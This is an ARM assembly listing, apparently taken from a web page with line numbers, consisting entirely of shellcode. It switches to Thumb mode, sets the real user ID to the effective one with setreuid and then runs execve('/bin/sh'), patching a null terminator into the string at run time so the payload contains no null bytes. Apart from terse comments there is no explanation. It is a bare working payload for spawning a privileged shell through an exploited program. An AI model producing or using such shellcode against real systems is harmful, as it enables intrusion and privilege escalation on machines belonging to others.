ARM

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

.section .text
.global _start

_start:
    .code 32
    # Switch to Thumb mode
    add r3, pc, #1
    bx r3

    .code 16
    # r0 = geteuid()
    mov r7, #201
    svc #1

    # setreuid(geteuid(), geteuid())
    mov r1, r0
    mov r7, #203
    svc #1

    # execve("/bin/sh", 0, 0)
    adr     r0, binsh
    sub     r1, r1
    sub r2, r2
    strb    r2, [r0, #7]  // change binsh[7] to \0
    mov r7, #11
    svc #1

    # padding to align binsh
    mov r1, r7

binsh:
.ascii "/bin/shX"